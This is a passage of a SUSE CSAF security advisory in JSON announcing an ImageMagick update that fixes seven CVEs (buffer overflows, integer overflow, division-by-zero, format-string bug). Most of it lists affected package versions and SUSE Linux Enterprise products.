"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for ImageMagick",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for ImageMagick fixes the following issues:\n\n- CVE-2025-55004: Fixed heap buffer over-read in in ReadOneMNGIMage when processing images with separate alpha channels\n (bsc#1248076).\n- CVE-2025-55005: Fixed heap buffer overflow when transforming from Log to sRGB colorspaces (bsc#1248077).\n- CVE-2025-55154: Fixed integer overflow when performing magnified size calculations in ReadOneMNGIMage (bsc#1248078).\n- CVE-2025-55160: Fixed undefined behavior due to function-type-mismatch in CloneSplayTree (bsc#1248079).\n- CVE-2025-55212: Fixed division-by-zero in ThumbnailImage() when passing a geometry string containing only a colon to\n `montage -geometry` (bsc#1248767). \n- CVE-2025-55298: Fixed heap overflow due to format string bug vulnerability (bsc#1248780).\n- CVE-2025-57803: Fixed heap out-of-bounds (OOB) write due to 32-bit integer overflow (bsc#1248784).\n \nOther fixes: \n\n- Fixed output file placeholders (bsc#1247475).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-3152,SUSE-SLE-Module-Desktop-Applications-15-SP6-2025-3152,SUSE-SLE-Module-Desktop-Applications-15-SP7-2025-3152,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2025-3152,SUSE-SLE-Product-HPC-15-SP4-LTSS-2025-3152,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2025-3152,SUSE-SLE-Product-HPC-15-SP5-LTSS-2025-3152,SUSE-SLE-Product-SLES-15-SP4-LTSS-2025-3152,SUSE-SLE-Product-SLES-15-SP5-LTSS-2025-3152,SUSE-SLE-Product-SLES_SAP-15-SP4-2025-3152,SUSE-SLE-Product-SLES_SAP-15-SP5-2025-3152",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_03152-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:03152-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-202503152-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:03152-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-September/041606.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247475",
"url": "https://bugzilla.suse.com/1247475"
},
{
"category": "self",
"summary": "SUSE Bug 1248076",
"url": "https://bugzilla.suse.com/1248076"
},
{
"category": "self",
"summary": "SUSE Bug 1248077",
"url": "https://bugzilla.suse.com/1248077"
},
{
"category": "self",
"summary": "SUSE Bug 1248078",
"url": "https://bugzilla.suse.com/1248078"
},
{
"category": "self",
"summary": "SUSE Bug 1248079",
"url": "https://bugzilla.suse.com/1248079"
},
{
"category": "self",
"summary": "SUSE Bug 1248767",
"url": "https://bugzilla.suse.com/1248767"
},
{
"category": "self",
"summary": "SUSE Bug 1248780",
"url": "https://bugzilla.suse.com/1248780"
},
{
"category": "self",
"summary": "SUSE Bug 1248784",
"url": "https://bugzilla.suse.com/1248784"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55004 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55004/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55005 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55160 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55160/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55212 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55212/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55298 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55298/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-57803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-57803/"
}
],
"title": "Security update for ImageMagick",
"tracking": {
"current_release_date": "2025-09-10T18:04:37Z",
"generator": {
"date": "2025-09-10T18:04:37Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:03152-1",
"initial_release_date": "2025-09-10T18:04:37Z",
"revision_history": [
{
"date": "2025-09-10T18:04:37Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.40.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-devel-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product": {
"name": "ImageMagick-devel-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product_id": "ImageMagick-devel-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product": {
"name": "libMagick++-7_Q16HDRI5-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product_id": "libMagick++-7_Q16HDRI5-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product": {
"name": "libMagick++-devel-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product_id": "libMagick++-devel-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product": {
"name": "libMagickCore-7_Q16HDRI10-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product_id": "libMagickCore-7_Q16HDRI10-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product": {
"name": "libMagickWand-7_Q16HDRI10-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32",
"product_id": "libMagickWand-7_Q16HDRI10-64bit-7.1.0.9-150400.6.40.1.aarch64_ilp32"
}
}
],
"category": "architecture",
"name": "aarch64_ilp32"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.i586",
"product_id": "ImageMagick-7.1.0.9-150400.6.40.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.i586",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.i586",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.i586",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.40.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.i586",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.40.1.i586"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.i586",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.i586"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.i586",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.40.1.i586"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.i586",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.i586"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.i586",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.i586"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.i586",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.i586",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.40.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.0.9-150400.6.40.1.noarch",
"product": {
"name": "ImageMagick-doc-7.1.0.9-150400.6.40.1.noarch",
"product_id": "ImageMagick-doc-7.1.0.9-150400.6.40.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "ImageMagick-7.1.0.9-150400.6.40.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.40.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"product_id": "ImageMagick-7.1.0.9-150400.6.40.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.s390x",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.40.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.40.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "ImageMagick-devel-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "ImageMagick-devel-32bit-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "libMagick++-devel-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "libMagick++-devel-32bit-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.0.9-150400.6.40.1.x86_64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-desktop-applications:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-desktop-applications:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
